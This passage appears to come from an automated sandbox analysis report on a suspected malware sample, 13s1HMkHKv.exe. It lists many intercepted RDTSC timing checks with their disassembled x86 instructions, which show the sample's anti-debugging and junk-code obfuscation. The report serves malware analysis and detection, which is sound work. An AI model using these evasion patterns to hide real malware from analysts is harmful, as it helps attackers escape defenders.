                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D534A3 second address: D5352F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jno 00007F0550D663C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov edx, dword ptr [ebp+122D25DDh] 0x00000015 push dword ptr [ebp+122D1F06h] 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F0550D663C8h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 movzx edx, dx 0x00000038 call 00007F0550D663C9h 0x0000003d jns 00007F0550D663D8h 0x00000043 push eax 0x00000044 push edi 0x00000045 pushad 0x00000046 jmp 00007F0550D663D9h 0x0000004b jc 00007F0550D663C6h 0x00000051 popad 0x00000052 pop edi 0x00000053 mov eax, dword ptr [esp+04h] 0x00000057 push eax 0x00000058 push edx 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D5352F second address: D53534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D53534 second address: D5353A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D5353A second address: D53550 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b jne 00007F0550733D08h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D53550 second address: D5356A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0550D663C6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jp 00007F0550D663D4h 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D568F9 second address: D568FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D568FD second address: D56938 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0550D663C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f je 00007F0550D663C6h 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F0550D663D3h 0x0000001c popad 0x0000001d popad 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F0550D663CCh 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5450D89 second address: 5450D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5450D8D second address: 5450D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5450D93 second address: 5450D99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5450D99 second address: 5450D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5450D9D second address: 5450DC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5450DC2 second address: 5450DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5450DC6 second address: 5450DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5450DCA second address: 5450DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5450DD0 second address: 5450E4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F0550733D16h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F0550733D13h 0x00000019 or si, 143Eh 0x0000001e jmp 00007F0550733D19h 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebx, esi 0x00000027 popad 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov ebx, 2A02A1AAh 0x00000031 call 00007F0550733D0Bh 0x00000036 pop esi 0x00000037 popad 0x00000038 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54209B4 second address: 54209FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0550D663D7h 0x00000009 adc si, 669Eh 0x0000000e jmp 00007F0550D663D9h 0x00000013 popfd 0x00000014 mov esi, 02225A67h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54209FE second address: 5420A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5420A02 second address: 5420A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5420A06 second address: 5420A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5420A0C second address: 5420A12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5420A12 second address: 5420A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5420A16 second address: 5420A1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5460EA6 second address: 5460EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5460EAA second address: 5460EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5460EB0 second address: 5460EDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F0550733D10h 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov bx, 9952h 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5460EDB second address: 5460EE6 instructions: 0x00000000 rdtsc 0x00000002 mov bx, F89Eh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5460EE6 second address: 5460F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov si, bx 0x0000000d mov ebx, 1F33E85Ah 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 jmp 00007F0550733D11h 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push edi 0x0000001f pop eax 0x00000020 popad 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53E0C21 second address: 53E0C9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov eax, 31CE5823h 0x00000010 movzx esi, bx 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 mov edi, 4C9D5BE4h 0x0000001c mov edi, 1CC65250h 0x00000021 popad 0x00000022 push dword ptr [ebp+04h] 0x00000025 pushad 0x00000026 mov edi, 03721B68h 0x0000002b call 00007F0550D663D1h 0x00000030 pushfd 0x00000031 jmp 00007F0550D663D0h 0x00000036 sub esi, 6F7F6DC8h 0x0000003c jmp 00007F0550D663CBh 0x00000041 popfd 0x00000042 pop esi 0x00000043 popad 0x00000044 push dword ptr [ebp+0Ch] 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53E0C9F second address: 53E0CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53E0CA3 second address: 53E0CA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53E0CF7 second address: 53E0CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410983 second address: 5410989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410989 second address: 541098D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 541098D second address: 54109B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0550D663D0h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54109B3 second address: 54109B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54109B9 second address: 54109BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54109BF second address: 54109C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54109C3 second address: 54109D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ah, E3h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54109D3 second address: 54109D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54109D8 second address: 54109DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54109DE second address: 54109E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54109E2 second address: 54109E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54109E6 second address: 54109F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54109F7 second address: 5410A23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F0550D663CDh 0x00000013 mov bx, ax 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54606F1 second address: 54606F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54606F7 second address: 5460730 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0550D663D6h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0550D663D7h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5460730 second address: 546076D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F0550733D0Eh 0x00000010 pop ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0550733D0Ch 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 546062C second address: 5460630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5460630 second address: 5460636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5460636 second address: 5460652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0550D663D8h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5460652 second address: 5460656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5460656 second address: 5460677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov ebx, ecx 0x0000000c mov cx, 1F05h 0x00000010 popad 0x00000011 mov dword ptr [esp], ebp 0x00000014 pushad 0x00000015 mov dx, ax 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5460677 second address: 546067B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 546067B second address: 546067F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 546067F second address: 5460685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5460685 second address: 54606B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0550D663D5h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54606B4 second address: 54606BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54604F0 second address: 54604F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54604F4 second address: 5460545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 movzx esi, dx 0x0000000c mov bh, ABh 0x0000000e popad 0x0000000f mov dword ptr [esp], ebp 0x00000012 pushad 0x00000013 push esi 0x00000014 mov ax, dx 0x00000017 pop edx 0x00000018 pushfd 0x00000019 jmp 00007F0550733D18h 0x0000001e and esi, 2E000838h 0x00000024 jmp 00007F0550733D0Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov edx, 281BD826h 0x00000035 mov ecx, edx 0x00000037 popad 0x00000038 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54207ED second address: 54207FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54207FC second address: 5420831 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0550733D0Fh 0x00000009 and ecx, 2E4972CEh 0x0000000f jmp 00007F0550733D19h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5420831 second address: 5420844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movsx edi, cx 0x0000000f movzx eax, dx 0x00000012 popad 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5420844 second address: 5420871 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0550733D0Ah 0x00000008 mov bl, ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0550733D18h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5460A2F second address: 5460A35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5460A35 second address: 5460A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5460A39 second address: 5460AAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F0550D663D4h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F0550D663CDh 0x0000001a and eax, 203346E6h 0x00000020 jmp 00007F0550D663D1h 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007F0550D663D0h 0x0000002c jmp 00007F0550D663D5h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5460AAA second address: 5460ADE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 jmp 00007F0550733D13h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0550733D15h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5410891 second address: 54108AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 jmp 00007F0550D663CBh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 movsx edx, cx 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5450E8C second address: 5450E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5450E92 second address: 5450EB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F0550D663CCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 mov cx, 14C3h 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5450EB1 second address: 5450EDE instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushfd 0x0000000a jmp 00007F0550733D12h 0x0000000f add cx, 5788h 0x00000014 jmp 00007F0550733D0Bh 0x00000019 popfd 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54608B6 second address: 54608C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54608C5 second address: 54608DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0550733D14h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54608DD second address: 546090E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0550D663CEh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0550D663D7h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 546090E second address: 5460938 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, di 0x00000011 mov di, DBCAh 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5430499 second address: 54304C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0550D663D1h 0x00000009 and cx, 0D16h 0x0000000e jmp 00007F0550D663D1h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53F0140 second address: 53F0158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0550733D14h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 53F0158 second address: 53F0197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F0550D663CCh 0x00000010 and ecx, 2E54D2A8h 0x00000016 jmp 00007F0550D663CBh 0x0000001b popfd 0x0000001c push esi 0x0000001d mov ax, dx 0x00000020 pop edi 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F0550D663CDh 0x0000002a rdtsc
